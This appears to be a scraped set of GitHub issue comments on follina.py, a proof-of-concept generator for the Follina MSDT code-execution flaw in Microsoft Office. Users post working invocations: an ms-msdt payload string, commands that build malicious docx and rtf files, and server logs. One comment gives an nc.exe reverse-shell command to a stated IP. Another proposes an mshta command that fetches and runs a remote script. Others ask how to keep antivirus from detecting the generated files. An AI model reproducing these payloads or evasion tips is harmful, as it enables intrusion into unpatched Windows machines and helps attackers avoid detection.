chvancooten / follina.py Goto Github PK

I'm going to run this directly in Win+R

ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc)/.exe"

I can open calc,But using Word with exp shows that exp is loaded but MSDT is not executed

The RTF files are being detected as CVE-2017-0199, any pointers or ideas on what we could do to avoid the rtf file being detected as CVE-2017-0199?

C:\Users\shaun\Desktop\follina.py>follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo whoami > c:\users\shaun\Desktop\follina.py\owned.txt'"
Generated 'clickme.docx' in current directory
Generated 'exploit.html' in 'www' directory
Serving payload on http://localhost:80/exploit.html
127.0.0.1 - - [30/May/2022 21:21:53] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:53] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:53] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:53] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:53] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] "GET /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] code 501, message Unsupported method ('OPTIONS')
127.0.0.1 - - [30/May/2022 21:21:55] "OPTIONS / HTTP/1.1" 501 -
127.0.0.1 - - [30/May/2022 21:21:55] "GET /exploit.html HTTP/1.1" 304 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:55] "HEAD /exploit.html HTTP/1.1" 200 -
127.0.0.1 - - [30/May/2022 21:21:56] "HEAD /exploit.html HTTP/1.1" 200 -

Getting this message when attempting to replicate.

Hello,

Related to your post in twitter (https://twitter.com/chvancooten/status/1531269822444601349) I test the template with M365.
It doesn't work with Microsoft 365 desktop Version 2205 (build 15225.20204 Office).

However the powershell script works properly.

Piedacoulisse

error detering http hosting address. did you provide an interface or IP?

Hello,

I'm trying to test the remote version of the exploit in a more realistic setting, i.e. I'm actually uploading an executable to a web server and trying to specify the url with the -u switch. But I get an error that says that I have to specify the executable:

$ python follina.py -t docx -m binary -u https://www.example.com/my_payload.exe
Binary mode requires a binary to be specified, e.g. -b '\\localhost\c$\Windows\System32\calc.exe'

My understanding is that by supplying an URL the script should generate an exploit that tries to retrieve the executable from the web server instead of searching locally, am I getting this wrong?

I am using the latest version today, and the document starts to report an error as soon as it runs. It seems that the http.server has not been successfully started?

Manually created http.server service can receive requests, but cannot go online cs ：(

From the log, there is no request to access payloadps1，Which step am I doing wrong?🤔

my server receives the connections, exploit doesnt seem to work with latest word version 2205 tho. got it working with older ones

Hello,

When i try to execute the .doc file, it contact my server to download exploit.html but nothing happens.
What's more, when i reach exploit.html directly, it opens the mstd but with passkey and nothing happens....

I use Open Office 2019 and Windows 10. Do you have an idea about this issue ? I try on Windows 11 too.

Thank you.

The first attack can succeed and then fail. It's strange

the maked docx can be detected as malicious by many avs, upload it to the virustotal, you can see the result.

Hi,
First of all, thank you for this PoC. The right usage shold be as follows for path of the binary.
python3 follina.py -m binary -b \\windows\\system32\\calc.exe -u <IP>
or
python3 follina.py -m binary -b calc.exe -u <IP>
Specifying with single back-slash causes that the specified binary is not found. This can be seen with following screenshoot.

Thank you again

I have disabled Windows Defender Security and lauched the command :
python .\follina.py -t docx -m binary -b C:\Windows\System32\calc.exe

When I launch the docx I can perfectly see the GET requests from Word Office but the calc.exe doesn't open.
Obviously I have checked that I can manually open the calculator application.

What do you think the problem is ?
Thanks in advance.

Windows Defender on Windows 8.1 (and perhaps above) will remove some generated files creating an OSError [ERRNO 22]. To fix this simply turn off windows defender.

Hi there, I'm hoping to use this script to generate a Word document that gets the payload from a remote URL.

As mentioned in the docs, you can use -u to specify a URL, but it doesn't seem to do anything, the generated document still tries to reach out to localhost.

Hey,
so I was playing around with this POC and I was trying to get a .rtf to pull the .html from a VM that wasnt the one executing the maldoc.
So I tried using the -u option but I noticed that it was still contacting http://localhost:80/exploit.html, even when the local server didnt even start.
To solve the issue I tried to mess with the rtf template and I noticed that there were 2 http://localhost:80/exploit.html instances, one generated by the {payload_url} in the py code and one hardcoded (to find it: ctrl + f > http://lo).
The weird thing is that even by changing both urls to the ip I was trying to contact the .rtf still performed GET requests to localhost.
Am I missing something obvious here?

Steps to reprodude the issue:

1. python .\follina.py -t rtf -m command -c "Start-Process cmd.exe" -u https://google.com
2. python .\follina.py -t docx -m command -c "Start-Process cmd.exe"
3. open the .rtf
   A GET request will be logged and cmd.exe will start even tho I doubt that google is hosting exploit.html lol

For my version of python (3.6 I believe), the simple http server doesn’t take a directory argument and this needs to be removed and the HTML file put into the main directory as that is where the simple http server will serve files from.

got a TypeError

Created clickme.docx using the below command line
python .\follina.py -t docx -m binary -b \windows\system32\calc.exe -u

Is there a way to add content to docx/rtf file? Because after I've opened the file, added some content and saved it, it stoped working.

@chvancooten thanks for your follina script !

what if use not msdt , can Ms word spawn something another Url handlers that can execute pwsh ?

Here is a bit of em what have bypass and execute options
Here is mshta nandisec/mshta@909383b here is a list of https://lolbas-project.github.io/#

Like a mshta.exe vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) - something like that

python .\follina.py -t docx -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c c:\windows\system32\nc.exe -e cmd 192.168.25.148 5555'" -H 192.168.25.148 -P 8080我试过这个，并且在攻击机打开nc监听，之后用靶机点击word文档，攻击机的8080可以监听到数据，但是5555并没有拿到nc反弹的shell。

Traceback (most recent call last):
File "C:\TEMP\follina.py", line 23, in
with open("src/document.xml.rels.tpl", "r") as f:
FileNotFoundError: [Errno 2] No such file or directory: 'src/document.xml.rels.tpl'

Am I missing something beyond the python3 .\follina.py needed to execute this?